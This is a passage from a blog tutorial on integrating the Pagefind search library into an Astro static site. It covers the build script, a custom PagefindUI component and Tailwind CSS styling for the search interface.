        "dev": "astro dev",
        "start": "astro dev",
        "build": "astro build && pagefind --site dist && rm dist/pagefind/*.css && cp -r dist/pagefind public/",
        "preview": "astro preview",
        "astro": "astro"
      },
    

If you are not using Astro.js, you will have to replace dist with your build directory. I will also explain why I am making the CSS disappear.

    Running the command should automagically build your index like so:

    Bash
    [Building search indexes]
    Total:
      Indexed 1 language
      Indexed 19 pages
      Indexed 1328 words
      Indexed 0 filters
      Indexed 0 sorts
    
    Finished in 0.043 seconds
    

Now, my site is not that big yet, but 0.043 seconds is still very fast, and if you are paying for build time, also next to nothing. Pagefind, being written in Rust, is very efficient.

    Getting Cozy with Pagefind’s UI

    Alright, so now you’ve got this powerful search engine at your fingertips. But wait, what’s this? Pagefind’s UI is a bit… opinionated. Fear not, fellow sorcerers! With a dash of JavaScript and a sprinkle of CSS, we’ll make it dance to our tune!

    Weaving a custom UI spell involves a bit of JavaScript incantation to tweak placeholders and buttons just the way we like them. Plus, with a bit of CSS wizardry, we can transform Pagefind’s UI into something straight out of our own enchanting design dreams!

    Astro
    ---
    import "../style/pagefind.css";
    ---
    
    <div class="max-w-96 flex">
      <div id="search"></div>
    </div>
    
    <script src="/pagefind/pagefind-ui.js" is:inline></script>
    <script>
      document.addEventListener("astro:page-load", () => {
        // @ts-ignore
        new PagefindUI({
          element: "#search",
          debounceTimeoutMs: 500,
          resetStyles: true,
          showEmptyFilters: false,
          excerptLength: 15,
          showImages: false,
          addStyles: false,
          //showSubResults: true,
        });
        const searchInput = document.querySelector<HTMLInputElement>(
          ".pagefind-ui__search-input"
        );
    const clearButton = document.querySelector<HTMLDivElement>(
      ".pagefind-ui__search-clear"
    );
    
        if (searchInput) {
          searchInput.placeholder = "Site Search";
        }
    
        if (clearButton) {
          clearButton.innerText = "Clear";
        }
      });
    </script>
    
• /pagefind/pagefind-ui.js is Pagefind-specific JavaScript. In the future I plan to reverse it, as there is a lot of unnecessary code in there.
    • I am using astro:page-load as an event listener since I am using view transitions.

    Embrace Your Inner Stylist

    Ah, but crafting a unique style for your search UI is where the real fun begins! With the power of TailwindCSS (or your trusty CSS wand), you can mold Pagefind’s UI to fit your site’s aesthetic like a bespoke wizard robe.

    With a little imagination and a lot of creativity, you’ll end up with a search UI that’s as unique as your magical incantations.

    CSS
    .pagefind-ui__results-area {
      @apply border border-pink-500 dark:text-white text-black p-4;
      @apply absolute z-50 dark:bg-gray-900 bg-white;
      @apply max-h-96 overflow-y-auto  mr-10;
    }
    
    .pagefind-ui__result {
      @apply border-t my-4 dark:text-white text-black;
    }
    
    .pagefind-ui__result mark {
      @apply bg-fuchsia-700 text-fuchsia-300;
    }
    
    .pagefind-ui__form {
      @apply border dark:border-white border-black;
    }
    
    .pagefind-ui__search-input {
      @apply dark:text-white text-black  bg-transparent;
    }
    
    .pagefind-ui__search-input {
      @apply placeholder:italic placeholder:text-slate-400 p-2 border-r border-black;
    }
    
    .pagefind-ui__form {
      @apply min-w-full;
    }
    
    .pagefind-ui__message {
      @apply font-semibold first-letter:text-pink-500;
    }
    
    .pagefind-ui__result-link {
      @apply font-bold underline text-blue-500;
    }
    .pagefind-ui__result-title {
      @apply mb-1;
    }
    
    .pagefind-ui__result-inner {
      @apply my-3;
    }
    
    /* load more results button */
    .pagefind-ui__button {
      @apply border border-black py-1 px-2 hover:underline mt-4;
    }
    
    .pagefind-ui__search-clear {
      @apply mr-2;
    }
    

    (@apply is TailwindCSS specific, you can use regular CSS if you please)

    And there you have it, folks – the mystical journey of integrating Pagefind into your static site, complete with a touch of your own wizardly flair!

(Screenshot: custom search UI)

    Now go forth, weave your web spells, and may your users’ search journeys be as magical as your coding adventures! 🧙✨

    Where to go from here

I gave you a quick look into building a simple static site search. In my opinion, the JavaScript files from Pagefind should be slimmed down (in my case, for Astro), the CSS should be applied by you, and Pagefind should just ship a simple unstyled search. I am sure they would be happy if someone helped them out by doing this.

I was thinking about hosting my index on a Cloudflare Worker, then styling my search form however I want and just hooking the Worker endpoint up to the form, basically a self-hosted Algolia. An alternative to Pagefind could be Fuse.js; the drawback is that you would have to build your own index.

    Bonus:

    You can try out my search here: Exploit.to Search

This post was originally published on 17 Mar 2024 on my cybersecurity blog.